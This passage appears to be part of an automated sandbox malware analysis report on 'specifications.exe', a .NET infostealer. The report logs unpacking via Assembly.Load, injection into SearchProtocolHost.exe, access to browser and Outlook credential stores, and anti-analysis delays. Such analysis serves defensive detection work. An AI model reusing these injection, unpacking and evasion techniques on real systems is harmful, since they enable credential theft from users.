                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BA9C327_2_00BA9C32
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B4FDC07_2_00B4FDC0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE7D737_2_00BE7D73
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE1D5A7_2_00BE1D5A
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B33D407_2_00B33D40
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B39EB07_2_00B39EB0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEFFB17_2_00BEFFB1
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B31F927_2_00B31F92
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00AF3FD57_2_00AF3FD5
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00AF3FD27_2_00AF3FD2
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEFF097_2_00BEFF09
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_001220107_2_00122010
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011CF007_2_0011CF00
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011B1167_2_0011B116
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011B1207_2_0011B120
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011D1207_2_0011D120
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011B2707_2_0011B270
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011B2647_2_0011B264
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011B3387_2_0011B338
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_001256907_2_00125690
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_001238907_2_00123890
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0013BCD07_2_0013BCD0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_009EE3587_2_009EE358
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_009EE4737_2_009EE473
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_009ED8D87_2_009ED8D8
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_009EE80E7_2_009EE80E
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_009ECB357_2_009ECB35
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_009ECB787_2_009ECB78
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 00B1B970 appears 262 times
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 00B9EA12 appears 86 times
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 00BAF290 appears 103 times
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 00B65130 appears 58 times
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 00B77E54 appears 107 times
                      Source: C:\Users\user\Desktop\specifications.exeCode function: String function: 0110F290 appears 103 times
                      Source: C:\Users\user\Desktop\specifications.exeCode function: String function: 010C5130 appears 58 times
                      Source: C:\Users\user\Desktop\specifications.exeCode function: String function: 010FEA12 appears 86 times
                      Source: C:\Users\user\Desktop\specifications.exeCode function: String function: 0107B970 appears 262 times
                      Source: C:\Users\user\Desktop\specifications.exeCode function: String function: 010D7E54 appears 107 times
                      Source: specifications.exe, 00000000.00000002.1734068950.00000000049B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs specifications.exe
                      Source: specifications.exe, 00000000.00000002.1733539504.00000000031B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs specifications.exe
                      Source: specifications.exe, 00000000.00000002.1745391025.000000000B9C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs specifications.exe
                      Source: specifications.exe, 00000000.00000002.1745019052.000000000A050000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs specifications.exe
                      Source: specifications.exe, 00000000.00000000.1689473956.0000000000E88000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamexxYf.exe4 vs specifications.exe
                      Source: specifications.exe, 00000000.00000002.1733073059.000000000145E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs specifications.exe
                      Source: specifications.exe, 00000002.00000002.2040922349.000000000117D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs specifications.exe
                      Source: specifications.exe | Binary or memory string: OriginalFilenamexxYf.exe4 vs specifications.exe
                      Source: specifications.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: specifications.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.specifications.exe.49d24e8.1.raw.unpack, kAOj1Y7pfP90kycNNw.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.specifications.exe.a050000.5.raw.unpack, kAOj1Y7pfP90kycNNw.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, iRgP998qB2GsmTBLH3.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, kblALy0udoOuyRlAJl.cs | Security API names: _0020.SetAccessControl
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, kblALy0udoOuyRlAJl.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, kblALy0udoOuyRlAJl.cs | Security API names: _0020.AddAccessRule
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, kblALy0udoOuyRlAJl.cs | Security API names: _0020.SetAccessControl
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, kblALy0udoOuyRlAJl.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, kblALy0udoOuyRlAJl.cs | Security API names: _0020.AddAccessRule
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, iRgP998qB2GsmTBLH3.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, iRgP998qB2GsmTBLH3.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, kblALy0udoOuyRlAJl.cs | Security API names: _0020.SetAccessControl
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, kblALy0udoOuyRlAJl.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, kblALy0udoOuyRlAJl.cs | Security API names: _0020.AddAccessRule
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@19/12
                      Source: C:\Users\user\Desktop\specifications.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\specifications.exe.log
                      Source: C:\Users\user\Desktop\specifications.exe | Mutant created: NULL
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | File created: C:\Users\user\AppData\Local\Temp\sE716IK71M
                      Source: specifications.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\specifications.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: SearchProtocolHost.exe, 00000007.00000003.2218657622.0000000000488000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2218543579.0000000000467000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4144766432.0000000000488000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: specifications.exe | ReversingLabs: Detection: 50%
                      Source: unknown | Process created: C:\Users\user\Desktop\specifications.exe "C:\Users\user\Desktop\specifications.exe"
                      Source: C:\Users\user\Desktop\specifications.exe | Process created: C:\Users\user\Desktop\specifications.exe "C:\Users\user\Desktop\specifications.exe"
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe | Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: tquery.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: cryptdll.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: ieframe.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: mlang.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: winsqlite3.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: vaultcli.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe Section loaded: wininet.dll
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe Section loaded: mswsock.dll
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe Section loaded: dnsapi.dll
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe Section loaded: iphlpapi.dll
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe Section loaded: fwpuclnt.dll
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\specifications.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: C:\Users\user\Desktop\specifications.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: specifications.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: specifications.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: neghZqrDWkxUmu.exe, 00000006.00000002.4144559573.0000000000D5E000.00000002.00000001.01000000.0000000C.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145192109.0000000000D5E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: specifications.exe, 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2043007374.0000000000947000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2040816792.000000000079A000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: specifications.exe, specifications.exe, 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000007.00000003.2043007374.0000000000947000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2040816792.000000000079A000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: SearchProtocolHost.pdbUGP source: neghZqrDWkxUmu.exe, 00000006.00000003.1980326179.000000000127C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: SearchProtocolHost.pdb source: neghZqrDWkxUmu.exe, 00000006.00000003.1980326179.000000000127C000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.specifications.exe.49d24e8.1.raw.unpack, kAOj1Y7pfP90kycNNw.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.specifications.exe.a050000.5.raw.unpack, kAOj1Y7pfP90kycNNw.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, kblALy0udoOuyRlAJl.cs .Net Code: kfOcHLud8M System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specifications.exe.49d24e8.1.raw.unpack, GtaAIbrHXObmMm8GPA.cs .Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, kblALy0udoOuyRlAJl.cs .Net Code: kfOcHLud8M System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specifications.exe.a050000.5.raw.unpack, GtaAIbrHXObmMm8GPA.cs .Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, kblALy0udoOuyRlAJl.cs .Net Code: kfOcHLud8M System.Reflection.Assembly.Load(byte[])
                      Source: specifications.exe Static PE information: 0x91062694 [Wed Feb 6 20:56:52 2047 UTC]
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 0_2_02FE0B2C push ebp; iretd 0_2_02FE0B30
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 0_2_0A0A3CE8 push esp; ret 0_2_0A0A3CF5
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 2_2_00414B10 push edx; retf A241h 2_2_00414B38
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 2_2_00405057 push es; retf 2_2_00405075
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 2_2_00416074 push eax; retf 2_2_0041609C
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 2_2_00412176 push edx; iretd 2_2_00412179
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 2_2_0040AC7B push es; retf 2_2_0040AC88
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 2_2_00403400 push eax; ret 2_2_00403402
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 2_2_00411CE9 push esp; retf 2_2_00411C7E
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 2_2_00415FBD pushad ; retf 2_2_00415FBE
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 2_2_0105225F pushad ; ret 2_2_010527F9
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 2_2_010527FA pushad ; ret 2_2_010527F9
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 2_2_010809AD push ecx; mov dword ptr [esp], ecx 2_2_010809B6
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 2_2_0105283D push eax; iretd 2_2_01052858
                      Source: C:\Users\user\Desktop\specifications.exe Code function: 2_2_01051368 push eax; iretd 2_2_01051369
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe Code function: 6_2_032DCB31 push edx; iretd 6_2_032DCB34
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe Code function: 6_2_032E0A2F push eax; retf 6_2_032E0A57
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe Code function: 6_2_032CFA12 push es; retf 6_2_032CFA30
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe Code function: 6_2_032E0978 pushad ; retf 6_2_032E0979
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe Code function: 6_2_032D5636 push es; retf 6_2_032D5643
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe Code function: 6_2_032DC6A4 push esp; retf 6_2_032DC639
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe Code function: 6_2_032E340C push eax; retf 6_2_032E340D
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 7_2_00AF225F pushad ; ret 7_2_00AF27F9
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 7_2_00AF27FA pushad ; ret 7_2_00AF27F9
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 7_2_00AF283D push eax; iretd 7_2_00AF2858
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 7_2_00B209AD push ecx; mov dword ptr [esp], ecx 7_2_00B209B6
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 7_2_00AF1368 push eax; iretd 7_2_00AF1369
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 7_2_0011E52B push ebp; retf 7_2_0011E533
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 7_2_0011E8E6 push esp; retf 7_2_0011E87B
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 7_2_0011ED73 push edx; iretd 7_2_0011ED76
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 7_2_0012564E push eax; retf 7_2_0012564F
                      Source: specifications.exe Static PE information: section name: .text entropy: 7.769913343213509
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack High entropy of concatenated method names
                      Source: 0.2.specifications.exe.49d24e8.1.raw.unpack High entropy of concatenated method names
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack High entropy of concatenated method names
                      Source: 0.2.specifications.exe.a050000.5.raw.unpack High entropy of concatenated method names
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack High entropy of concatenated method names
                      Source: C:\Users\user\Desktop\specifications.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match, File source: Process Memory Space: specifications.exe PID: 7352, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, API/Special instruction interceptor: Address: 7FFE2220D324
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, API/Special instruction interceptor: Address: 7FFE2220D7E4
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, API/Special instruction interceptor: Address: 7FFE2220D944
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, API/Special instruction interceptor: Address: 7FFE2220D504
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, API/Special instruction interceptor: Address: 7FFE2220D544
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, API/Special instruction interceptor: Address: 7FFE2220D1E4
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, API/Special instruction interceptor: Address: 7FFE22210154
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, API/Special instruction interceptor: Address: 7FFE2220DA44
                      Source: C:\Users\user\Desktop\specifications.exe, Memory allocated: 2FA0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specifications.exe, Memory allocated: 31B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specifications.exe, Memory allocated: 3100000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specifications.exe, Memory allocated: 5780000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specifications.exe, Memory allocated: 6780000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specifications.exe, Memory allocated: 68B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specifications.exe, Memory allocated: 78B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specifications.exe, Memory allocated: BA50000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specifications.exe, Memory allocated: CA50000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specifications.exe, Memory allocated: CEE0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specifications.exe, Memory allocated: DEE0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\specifications.exe, Code function: 2_2_010C096E rdtsc 2_2_010C096E
                      Source: C:\Users\user\Desktop\specifications.exe, Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Window / User API: threadDelayed 9803
                      Source: C:\Users\user\Desktop\specifications.exe, API coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, API coverage: 2.6 %
                      Source: C:\Users\user\Desktop\specifications.exe TID: 7372, Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7976, Thread sleep count: 169 > 30
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7976, Thread sleep time: -338000s >= -30000s
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7976, Thread sleep count: 9803 > 30
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 7976, Thread sleep time: -19606000s >= -30000s
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe TID: 8000, Thread sleep time: -75000s >= -30000s
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe TID: 8000, Thread sleep count: 32 > 30
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe TID: 8000, Thread sleep time: -48000s >= -30000s
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe TID: 8000, Thread sleep count: 36 > 30
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe TID: 8000, Thread sleep time: -36000s >= -30000s
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Code function: 7_2_0012C860 FindFirstFileW,FindNextFileW,FindClose,7_2_0012C860
                      Source: neghZqrDWkxUmu.exe, 00000008.00000002.4144945463.0000000000B60000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                      Source: SearchProtocolHost.exe, 00000007.00000002.4144766432.0000000000419000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: firefox.exe, 00000009.00000002.2331577982.0000020EF56BC000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllee
                      Source: C:\Users\user\Desktop\specifications.exe, Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\specifications.exe, Process queried: DebugPort
